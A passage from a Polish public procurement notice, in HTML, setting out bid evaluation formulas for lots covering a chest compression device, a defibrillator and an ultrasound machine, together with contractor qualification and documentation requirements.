– 11 pkt.<br/>- za dodatkowe 12 miesięcy – 12 pkt.<br/>- za dodatkowy 13 miesięcy – 13 pkt.<br/>- za dodatkowe 14 miesięcy – 14 pkt.<br/>- za dodatkowe 15 miesięcy – 15 pkt.<br/>- za dodatkowe 16 miesięcy – 16 pkt.<br/>- za dodatkowe 17 miesięcy – 17 pkt.<br/>- za dodatkowe 18 miesięcy – 18 pkt.<br/>- za dodatkowe 19 miesięcy – 19 pkt.<br/>- za dodatkowe 20 miesięcy – 20 pkt.<br/>- za dodatkowe 21 miesięcy – 21 pkt.<br/>- za dodatkowe 22 miesiące – 22 pkt.<br/>- za dodatkowe 23 miesiące – 23 pkt.<br/>- za dodatkowe 24 miesiące – 24 pkt.<br/>Uwaga:<br/>Okres gwarancji należy określić z dokładnością do jednego miesiąca. W przypadku podania okresu gwarancji z dokładnością inną niż miesiąc zamawiający zaokrągli ilość punktów w dół.<br/>1 miesiąc = 30 dni.<br/>W przypadku zaoferowania okresu dłuższego niż 48 m-cy Zamawiający przyzna 24 pkt.<br/>C) - Kryterium: parametry techniczne – wskaźnik P – obliczony będzie według wzoru:<br/>P = ( Pp / Pmax ) x 20 <br/>Gdzie: <br/>Pp – ilość punktów otrzymanych przez badaną ofertę. <br/>Pmax – maksymalna ilość punktów do otrzymania w ramach kryterium parametry techniczne:<br/>Pmax = się odpowiednio dla:<br/>Zadanie 1 = 20 pkt.<br/>Opis oceniany w ramach kryterium – parametry techniczne szczegółowo został określony w załączniku nr 1 do SWZ pn: „Walory techniczno-eksploatacyjne punktowane przez użytkownika w kryterium Parametry techniczne”.<br/>D) - Ocena oferty – wskaźnik O obliczony będzie według wzoru:<br/>O = C + G + P<br/>Gdzie:<br/>O: wskaźnik ocena oferty.<br/>C: wskaźnik cena.<br/>G: wskaźnik okres gwarancji. <br/>P: wskaźnik parametry techniczne.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Parametry techniczne</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest sprzedaż, dostawa i uruchomienie urządzeń medycznych w zakresie: <br/>Zadanie 2 – Urządzenia do resuscytacji – Urządzenie do kompresji klatki piersiowej – 1 szt. <br/>a także przeszkolenie personelu medycznego i przeszkolenie personelu technicznego. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 80000,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33172200-8 - Urządzenia do resuscytacji</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-11-24</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze i ocenie złożonych ofert, Zamawiający kierować się będzie <br/>Nazwa kryterium<br/>Waga kryterium<br/>Cena. 60%<br/>Okres gwarancji. 20%<br/>Parametry techniczne. 20%<br/>Sposób oceniania ofert:<br/>A) - Kryterium: cena – wskaźnik C – obliczony będzie według wzoru:<br/>C = ( Cn / Cb ) x 60 <br/>Gdzie: <br/>Cn - cena brutto najtańszej oferty.<br/>Cb - cena brutto badanej oferty. <br/>B) - Kryterium: okres gwarancji – wskaźnik G – obliczony będzie według wzoru<br/>G = ( Gp / Gmax ) x 20 <br/>Gdzie: <br/>Gp – ilość punktów otrzymanych przez badaną ofertę. <br/>Gmax – maksymalna liczba punktów do otrzymania w ramach kryterium okres gwarancji.<br/>Gmax = 24 pkt. <br/>W przypadku zaoferowania okresu gwarancji 24 miesiące wykonawca otrzymuje 0 pkt.<br/>Opis oceniany w ramach kryterium - okres gwarancji <br/>Sposób przyznawania punktów:<br/>za każdy dodatkowy miesiąc ponad wartość wymaganą ( 24 miesiące) zamawiający przyzna 1 pkt., tzn.<br/>- za dodatkowy 1 miesiąc – 1 pkt.<br/>- za dodatkowe 2 miesiące – 2 pkt.<br/>- za dodatkowe 3 miesiące – 3 pkt.<br/>- za dodatkowe 4 miesiące – 4 pkt.<br/>- za dodatkowe 5 miesięcy – 5 pkt.<br/>- za dodatkowe 6 miesięcy – 6 pkt.<br/>- za dodatkowe 7 miesięcy – 7 pkt.<br/>- za dodatkowe 8 miesięcy – 8 pkt.<br/>- za dodatkowe 9 miesięcy – 9 pkt.<br/>- za dodatkowe 10 miesięcy – 10 pkt.<br/>- za dodatkowe 11 miesięcy – 11 pkt.<br/>- za dodatkowe 12 miesięcy – 12 pkt.<br/>- za dodatkowy 13 miesięcy – 13 pkt.<br/>- za dodatkowe 14 miesięcy – 14 pkt.<br/>- za dodatkowe 15 miesięcy – 15 pkt.<br/>- za dodatkowe 16 miesięcy – 16 pkt.<br/>- za dodatkowe 17 miesięcy – 17 pkt.<br/>- za dodatkowe 18 miesięcy – 18 pkt.<br/>- za dodatkowe 19 miesięcy – 19 pkt.<br/>- za dodatkowe 20 miesięcy – 20 pkt.<br/>- za dodatkowe 21 miesięcy – 21 pkt.<br/>- za dodatkowe 22 miesiące – 22 pkt.<br/>- za dodatkowe 23 miesiące – 23 pkt.<br/>- za dodatkowe 24 miesiące – 24 pkt.<br/>Uwaga:<br/>Okres gwarancji należy określić z dokładnością do jednego miesiąca. W przypadku podania okresu gwarancji z dokładnością inną niż miesiąc zamawiający zaokrągli ilość punktów w dół.<br/>1 miesiąc = 30 dni.<br/>W przypadku zaoferowania okresu dłuższego niż 48 m-cy Zamawiający przyzna 24 pkt.<br/>C) - Kryterium: parametry techniczne – wskaźnik P – obliczony będzie według wzoru:<br/>P = ( Pp / Pmax ) x 20 <br/>Gdzie: <br/>Pp – ilość punktów otrzymanych przez badaną ofertę. <br/>Pmax – maksymalna ilość punktów do otrzymania w ramach kryterium parametry techniczne:<br/>Pmax = się odpowiednio dla:<br/>Zadanie 2 = 40 pkt.<br/>Opis oceniany w ramach kryterium – parametry techniczne szczegółowo został określony w załączniku nr 1 do SWZ pn: „Walory techniczno-eksploatacyjne punktowane przez użytkownika w kryterium Parametry techniczne”.<br/>D) - Ocena oferty – wskaźnik O obliczony będzie według wzoru:<br/>O = C + G + P<br/>Gdzie:<br/>O: wskaźnik ocena oferty.<br/>C: wskaźnik cena.<br/>G: wskaźnik okres gwarancji. <br/>P: wskaźnik parametry techniczne.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Parametry techniczne</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest sprzedaż, dostawa i uruchomienie urządzeń medycznych w zakresie niżej wymienionych zadań:<br/>Zadanie 3 – Urządzenie do wspomagania serca – Defibrylator – 1 szt.<br/>a także przeszkolenie personelu medycznego i przeszkolenie personelu technicznego. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 40000,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33182100-0 - Defibrylatory</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-11-24</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze i ocenie złożonych ofert, Zamawiający kierować się będzie <br/>Nazwa kryterium<br/>Waga kryterium<br/>Cena. 60%<br/>Okres gwarancji. 20%<br/>Parametry techniczne. 20%<br/>Sposób oceniania ofert:<br/>A) - Kryterium: cena – wskaźnik C – obliczony będzie według wzoru:<br/>C = ( Cn / Cb ) x 60 <br/>Gdzie: <br/>Cn - cena brutto najtańszej oferty.<br/>Cb - cena brutto badanej oferty. <br/>B) - Kryterium: okres gwarancji – wskaźnik G – obliczony będzie według wzoru<br/>G = ( Gp / Gmax ) x 20 <br/>Gdzie: <br/>Gp – ilość punktów otrzymanych przez badaną ofertę. <br/>Gmax – maksymalna liczba punktów do otrzymania w ramach kryterium okres gwarancji.<br/>Gmax = 24 pkt. <br/>W przypadku zaoferowania okresu gwarancji 24 miesiące wykonawca otrzymuje 0 pkt.<br/>Opis oceniany w ramach kryterium - okres gwarancji <br/>Sposób przyznawania punktów:<br/>za każdy dodatkowy miesiąc ponad wartość wymaganą ( 24 miesiące) zamawiający przyzna 1 pkt., tzn.<br/>- za dodatkowy 1 miesiąc – 1 pkt.<br/>- za dodatkowe 2 miesiące – 2 pkt.<br/>- za dodatkowe 3 miesiące – 3 pkt.<br/>- za dodatkowe 4 miesiące – 4 pkt.<br/>- za dodatkowe 5 miesięcy – 5 pkt.<br/>- za dodatkowe 6 miesięcy – 6 pkt.<br/>- za dodatkowe 7 miesięcy – 7 pkt.<br/>- za dodatkowe 8 miesięcy – 8 pkt.<br/>- za dodatkowe 9 miesięcy – 9 pkt.<br/>- za dodatkowe 10 miesięcy – 10 pkt.<br/>- za dodatkowe 11 miesięcy – 11 pkt.<br/>- za dodatkowe 12 miesięcy – 12 pkt.<br/>- za dodatkowy 13 miesięcy – 13 pkt.<br/>- za dodatkowe 14 miesięcy – 14 pkt.<br/>- za dodatkowe 15 miesięcy – 15 pkt.<br/>- za dodatkowe 16 miesięcy – 16 pkt.<br/>- za dodatkowe 17 miesięcy – 17 pkt.<br/>- za dodatkowe 18 miesięcy – 18 pkt.<br/>- za dodatkowe 19 miesięcy – 19 pkt.<br/>- za dodatkowe 20 miesięcy – 20 pkt.<br/>- za dodatkowe 21 miesięcy – 21 pkt.<br/>- za dodatkowe 22 miesiące – 22 pkt.<br/>- za dodatkowe 23 miesiące – 23 pkt.<br/>- za dodatkowe 24 miesiące – 24 pkt.<br/>Uwaga:<br/>Okres gwarancji należy określić z dokładnością do jednego miesiąca. W przypadku podania okresu gwarancji z dokładnością inną niż miesiąc zamawiający zaokrągli ilość punktów w dół.<br/>1 miesiąc = 30 dni.<br/>W przypadku zaoferowania okresu dłuższego niż 48 m-cy Zamawiający przyzna 24 pkt.<br/>C) - Kryterium: parametry techniczne – wskaźnik P – obliczony będzie według wzoru:<br/>P = ( Pp / Pmax ) x 20 <br/>Gdzie: <br/>Pp – ilość punktów otrzymanych przez badaną ofertę. <br/>Pmax – maksymalna ilość punktów do otrzymania w ramach kryterium parametry techniczne:<br/>Pmax = się odpowiednio dla:<br/>Zadanie 3 = 20 pkt.<br/>Opis oceniany w ramach kryterium – parametry techniczne szczegółowo został określony w załączniku nr 1 do SWZ pn: „Walory techniczno-eksploatacyjne punktowane przez użytkownika w kryterium Parametry techniczne”.<br/>D) - Ocena oferty – wskaźnik O obliczony będzie według wzoru:<br/>O = C + G + P<br/>Gdzie:<br/>O: wskaźnik ocena oferty.<br/>C: wskaźnik cena.<br/>G: wskaźnik okres gwarancji. <br/>P: wskaźnik parametry techniczne.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Parametry techniczne</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest sprzedaż, dostawa i uruchomienie urządzeń medycznych w zakresie niżej wymienionych zadań:<br/>Zadanie 4 – Aparaty ultrasonograficzne – Aparat USG– 1 szt. <br/>a także przeszkolenie personelu medycznego i przeszkolenie personelu technicznego. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 210000,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33112200-0 - Aparaty ultrasonograficzne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-11-24</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze i ocenie złożonych ofert, Zamawiający kierować się będzie następującymi kryteriami:<br/>Nazwa kryterium	Waga kryterium<br/>Cena. 60%.<br/>Okres gwarancji 40%.<br/>Sposób oceniania ofert:<br/>A) - Kryterium: cena – wskaźnik C – obliczony będzie według wzoru:<br/>C = ( Cn / Cb ) x 60 – <br/>Gdzie: <br/>Cn - cena brutto najtańszej oferty.<br/>Cb - cena brutto badanej oferty. <br/>B) - Kryterium: Okres gwarancji – wskaźnik G – obliczony będzie według wzoru<br/>G = ( Gp / Gmax ) x 40 <br/>Gp – ilość punktów otrzymanych przez badaną ofertę. <br/>Gmax – maksymalna ilość punktów do otrzymania w ramach kryterium okres gwarancji <br/>Gmax = 24 pkt. <br/>W przypadku zaoferowania okresu gwarancji 24 miesiące wykonawca otrzymuje 0 pkt.<br/>Opis oceniany w ramach kryterium – okres gwarancji <br/>Sposób przyznawania punktów:<br/>dla: 24 m-cy &lt; okres gwarancji ≤ 48 m-cy, za każdy dodatkowy miesiąc ponad wartość wymaganą ( 24 miesiące ) zamawiający przyzna 1 pkt., tzn:<br/>- za dodatkowy 1 miesiąc – 1 pkt.<br/>- za dodatkowe 2 miesiące – 2 pkt.<br/>- za dodatkowe 3 miesiące – 3 pkt.<br/>- za dodatkowe 4 miesiące – 4 pkt.<br/>- za dodatkowe 5 miesięcy – 5 pkt.<br/>- za dodatkowe 6 miesięcy – 6 pkt.<br/>- za dodatkowe 7 miesięcy – 7 pkt.<br/>- za dodatkowe 8 miesięcy – 8 pkt.<br/>- za dodatkowe 9 miesięcy – 9 pkt.<br/>- za dodatkowe 10 miesięcy – 10 pkt.<br/>- za dodatkowe 11 miesięcy – 11 pkt.<br/>- za dodatkowe 12 miesięcy – 12 pkt.<br/>- za dodatkowy 13 miesięcy – 13 pkt.<br/>- za dodatkowe 14 miesięcy – 14 pkt.<br/>- za dodatkowe 15 miesięcy – 15 pkt.<br/>- za dodatkowe 16 miesięcy – 16 pkt.<br/>- za dodatkowe 17 miesięcy – 17 pkt.<br/>- za dodatkowe 18 miesięcy – 18 pkt.<br/>- za dodatkowe 19 miesięcy – 19 pkt.<br/>- za dodatkowe 20 miesięcy – 20 pkt.<br/>- za dodatkowe 21 miesięcy – 21 pkt.<br/>- za dodatkowe 22 miesiące – 22 pkt.<br/>- za dodatkowe 23 miesiące – 23 pkt.<br/>- za dodatkowe 24 miesiące – 24 pkt.<br/>Uwaga:<br/>Okres gwarancji należy podawać z dokładnością do jednego miesiąca. W przypadku podania okresu gwarancji z dokładnością większą niż jeden miesiąc zamawiający / zaokrągli ilość punktów w dół.<br/>1 miesiąc = 30 dni.<br/>W przypadku zaoferowania okresu dłuższego niż 48 m-cy zamawiający przyzna 24 pkt.<br/>O) - Ocena oferty – wskaźnik O obliczony będzie według wzoru:<br/>O = C + G <br/>Gdzie:<br/>O - wskaźnik ocena oferty.<br/>C - wskaźnik cena.<br/>G - wskaźnik okres gwarancji.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą się ubiegać Wykonawcy, którzy:<br/>1)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego, na podstawie:<br/> - art. 108 ust. 1 i art. 109 ust. 1 pkt. 4 ustawy Prawo zamówień publicznych, <br/> - art. 7 ust. 1, ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. poz. 835).<br/>2)	spełniają warunki udziału w postępowaniu dotyczące:<br/>a) zdolności do występowania w obrocie gospodarczym - Zamawiający nie stawia warunku w tym zakresie,<br/>b) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów - Zamawiający nie stawia warunku w tym zakresie,<br/>c) zdolności technicznej lub zawodowej - Zamawiający nie stawia warunku w tym zakresie,<br/>d) sytuacji ekonomicznej lub finansowej - Zamawiający nie stawia warunku w tym zakresie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Odpis lub informację z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt. 4 ustawy Prawo zamówień publicznych, sporządzone nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji. Wykonawca nie jest zobowiązany do złożenia dokumentu, jeżeli zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile wykonawca wskazał dane umożliwiające dostęp do tych dokumentów.<br/>2. Oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt. 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów, z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej - zgodnie z wzorem w załączniku nr 5 do SWZ.<br/>3. Oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych w zakresie podstaw wykluczenia z postępowania - zgodnie z wzorem w załączniku nr 6 do SWZ.<br/>4. W przypadku podmiotu, na którego zdolnościach lub sytuacji wykonawca polega na zasadach art. 118 PZP, wykonawca składa podmiotowe środki dowodowe, na potwierdzenie braku podstaw wykluczenia, w odniesieniu do każdego z tych podmiotów.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1. Aktualny dokument dotyczący oferowanego przedmiotu zamówienia ( np. opisy techniczne, i/lub instrukcja i/lub wyciągi z instrukcji użytkowania i/lub inne dokumenty opisowe i/lub oświadczenie/a producenta ). <br/>Wskazane powyżej dokumenty nie muszą potwierdzać wszystkich wymaganych przez Zamawiającego parametrów oferowanego przedmiotu zamówienia – dotyczy wszystkich zadań<br/>2 Oświadczenie że oferowany przedmiot zamówienia w zakresie wyrobu medycznego posiada aktualny dokument dopuszczający do obrotu i do używania zgodnie z ustawą o wyrobach medycznych ( tzn: deklarację zgodności i/lub deklarację zgodności UE i/lub certyfikat zgodności wydany przez jednostkę notyfikowaną - oświadczenie w tym zakresie zgodnie z wzorem określonym w załączniku nr 7 do SWZ - dotyczy wszystkich zadań.<br/>UWAGA: <br/>Jeżeli wykonawca nie złoży przedmiotowych środków dowodowych lub złoży przedmiotowe środki dowodowe, które będą niekompletne, Zamawiający wezwie do ich złożenia lub uzupełnienia w wyznaczonym przez siebie terminie. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> 1. Aktualny dokument dotyczący oferowanego przedmiotu zamówienia ( np. opisy techniczne, i/lub instrukcja i/lub wyciągi z instrukcji użytkowania i/lub inne dokumenty opisowe i/lub oświadczenie/a producenta ). <br/>Wskazane powyżej dokumenty nie muszą potwierdzać wszystkich wymaganych przez Zamawiającego parametrów oferowanego przedmiotu zamówienia – dotyczy wszystkich zadań<br/>2 Oświadczenie że oferowany przedmiot zamówienia w zakresie wyrobu medycznego posiada aktualny dokument dopuszczający do obrotu i do używania zgodnie z ustawą o wyrobach medycznych ( tzn: deklarację zgodności i/lub deklarację zgodności UE i/lub certyfikat zgodności wydany przez jednostkę notyfikowaną - oświadczenie w tym zakresie zgodnie z wzorem określonym w załączniku nr 7 do SWZ - dotyczy wszystkich zadań. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. W przypadku oświadczenia, o którym mowa w ogłoszeniu o zamówieniu w Sekcji V pkt. 5.5., Wykonawca składa je w zakresie wskazanym przez Zamawiającego – zgodnie z wzorem w załączniku nr 4 do SWZ.<br/>Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia, także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu jeżeli zostały postawione, w zakresie, w jakim wykonawca powołuje się na jego zasoby.<br/>2.	Zobowiązanie innych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia ale tylko w sytuacji jeżeli wykonawca będzie korzystał z zasobów innych podmiotów. <br/>3.	Pełnomocnictwo – w przypadku, gdy oferta będzie podpisywana przez osobę upoważnioną w sytuacji gdy reprezentacja nie wynika z właściwego rejestru lub innego urzędowego rejestru. Pełnomocnictwo winno być złożone w formie oryginału podpisane kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym albo elektronicznej kopii poświadczonej przez notariusza przy użyciu kwalifikowanego podpisu elektronicznego.<br/>4.	Wypełniony i podpisany załącznik nr 1 i 2 do SWZ.<br/>5. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które dostawy wykonają poszczególni Wykonawcy - oświadczenie w tym zakresie zgodnie z wzorem określonym w załączniku nr 8 do SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>1.2. W przypadku, o którym mowa w ppkt. 1.1. Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego, albo reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>1.3.Dokument pełnomocnictwa musi być załączony do oferty i zawierać wskazanie: <br/>- ustanowionego pełnomocnika oraz zakres jego umocowania, <br/>- także wykonawców ubiegających się o wspólne zamówienie.<br/>1.4.W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie, o którym mowa w SWZ w Rozdziale III pkt. 1 ppkt. 1.1. oraz dokumenty/oświadczenia o których mowa w SWZ w Rozdziale III pkt. 2 składa każdy z wykonawców wspólnie ubiegających się o zamówienie.<br/>1.5.Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego umowy współpracy, która musi być podpisana przez osoby uprawnione do reprezentowania wszystkich Wykonawców. Umowa winna być zawarta na okres realizacji całości zamówienia.<br/>1.6.	W formularzu oferty należy wpisać dane wszystkich podmiotów wspólnie ubiegających się o udzielenie zamówienia.<br/>1.7.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia składają odpowiednie oświadczenie, o którym mowa w SWZ – Rozdział III pkt. 1 ppkt. 1.6. jeżeli określono warunki udziału w postępowaniu, o których mowa w SWZ – Rozdział II pkt. 2 ppkt. 2)<br/>2.	Podmioty zagraniczne.<br/>2.1. Jeżeli wykonawca 